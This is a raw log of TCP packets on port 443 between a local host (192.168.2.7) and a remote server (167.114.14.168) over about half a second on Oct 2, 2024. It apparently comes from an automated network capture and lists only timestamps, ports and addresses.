                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.954807997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.954816103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.954859018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955426931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955451012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955482006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955490112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955512047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.955529928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.962949991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.962970018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.963018894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.963027000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.963040113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:49.963057995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.033685923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.033711910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.033823967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.033839941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.033883095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043411016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043443918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043504953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043514967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043557882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.043951035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044004917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044008970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044019938 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044053078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044533014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044554949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044584990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044593096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044610977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.044632912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045126915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045164108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045181036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045216084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045257092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045412064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045433044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045464039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045471907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045490980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045511007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045943022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045963049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.045993090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.046000004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.046026945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.046046019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.053525925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.053544998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.053633928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.053648949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.053688049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.124454021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.124490023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.124588013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.124605894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.124649048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134073019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134108067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134181023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134190083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134224892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134541988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134567022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134598017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134603977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134630919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.134648085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135328054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135353088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135380983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135395050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135411978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.135428905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136368990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136394024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136425018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136431932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136454105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.136471987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137022972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137043953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137075901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137082100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137105942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137121916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137667894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137696981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137727976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137734890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137757063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.137772083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.144041061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.144062996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.144114971 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.144123077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.144155979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.215049982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.215085030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.215178967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.215205908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.215224981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.220925093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224630117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224659920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224721909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224733114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224807978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.224807978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225140095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225171089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225208998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225218058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225245953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225260973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.225984097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226011038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226056099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226063013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226099014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226130962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226921082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226947069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226978064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.226984978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227010965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227037907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227468967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227499962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227530956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227536917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227561951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.227579117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228080034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228118896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228137970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228144884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228168964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.228187084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234755039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234790087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234841108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234854937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234880924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.234899998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305697918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305733919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305782080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305809021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305843115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.305860996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315059900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315084934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315146923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315156937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315177917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315196037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315592051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315615892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315646887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315654039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315680981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.315699100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.316426039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.316452980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.316513062 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.316523075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.316564083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317554951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317575932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317615032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317621946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317663908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.317663908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318075895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318097115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318140984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318147898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318185091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318581104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318608046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318619013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318625927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318638086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.318687916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.327812910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.327836037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.327908993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.327919006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.327959061 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.396141052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.396176100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.396295071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.396332979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.396373034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405766964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405793905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405857086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405870914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405884981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.405900955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406248093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406269073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406296015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406303883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406330109 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.406346083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.407181978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.407202959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.407229900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.407236099 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.407269955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408025980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408045053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408080101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408086061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408097029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408118963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408559084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408579111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408617973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408623934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408646107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.408660889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409246922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409266949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409295082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409301043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409323931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409339905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.409689903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.418154955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.418181896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.418235064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.418241024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.418282032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.486835957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.486867905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.486927986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.486939907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.486987114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496334076 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496356010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496440887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496444941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496462107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496495008 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496859074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496885061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496938944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496946096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.496978998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497658014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497679949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497708082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497714043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:50.497740030 CEST49713443192.168.2.7167.114.14.168
